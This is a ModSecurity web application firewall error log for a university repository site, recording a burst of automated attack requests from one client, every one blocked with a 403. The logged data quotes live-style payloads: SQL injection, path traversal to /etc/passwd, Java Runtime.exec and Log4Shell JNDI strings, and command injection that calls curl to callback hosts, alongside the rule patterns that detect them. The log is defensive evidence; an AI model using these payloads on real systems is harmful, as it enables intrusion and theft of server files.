[Tue Aug 29 11:30:48.349423 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAN@5AEAAAAO"]
[Tue Aug 29 11:30:48.411523 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAPpWewAAAAI"]
[Tue Aug 29 11:30:50.413375 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOOuZ4AAAAW"]
[Tue Aug 29 11:30:51.320663 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAPDn1MAAAAP"]
[Tue Aug 29 11:30:51.347733 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPxBVEAAAAS"]
[Tue Aug 29 11:30:51.424775 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgqx6swk8oxhjdt.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAPpWfYAAAAI"]
[Tue Aug 29 11:30:52.365548 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAOKNrsAAAAK"]
[Tue Aug 29 11:30:52.384775 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPpWfkAAAAI"]
[Tue Aug 29 11:30:53.304868 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAPOhb8AAAAa"]
[Tue Aug 29 11:30:54.475366 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAOKNsQAAAAK"]
[Tue Aug 29 11:30:54.507852 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPDn2MAAAAP"]
[Tue Aug 29 11:30:55.322837 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAOOubEAAAAW"]
[Tue Aug 29 11:30:55.425593 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAPOhcUAAAAa"]
[Tue Aug 29 11:30:56.349478 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAOOubcAAAAW"]
[Tue Aug 29 11:30:56.351142 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPxBWUAAAAS"]
[Tue Aug 29 11:30:56.403545 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAP05HcAAAAA"]
[Tue Aug 29 11:30:58.304486 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPDn3AAAAAP"]
[Tue Aug 29 11:30:59.314882 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgnxymyu55q4r3i.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPMmFwAAAAY"]
[Tue Aug 29 11:30:59.411747 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10g8Co-f0AAAPxBW4AAAAS"]
[Tue Aug 29 11:30:59.552520 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAP05IkAAAAA"]
[Tue Aug 29 11:31:01.364195 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05IwAAAAA"]
[Tue Aug 29 11:31:03.611582 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgt7xh1n4sep7hh.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9EAAAAI"]
[Tue Aug 29 11:31:04.705443 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgt6ooc7doroqhw.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgt6ooc7doroqhw.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP9HfUAAAAW"]
[Tue Aug 29 11:31:04.727066 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgzosqbede5aeo4.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQA-6EAAAAi"]
[Tue Aug 29 11:31:05.002129 2023] [:error] [pid 1025] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQBUFoAAAAj"]
[Tue Aug 29 11:31:05.733603 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "repositoryfeb.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQP64EAAAAx"]
[Tue Aug 29 11:31:06.330662 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQOvzAAAAAw"]
[Tue Aug 29 11:31:06.387771 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQV4OcAAAA3"]
[Tue Aug 29 11:31:07.360891 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgszp938kod95rm.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQLC@0AAAAt"]
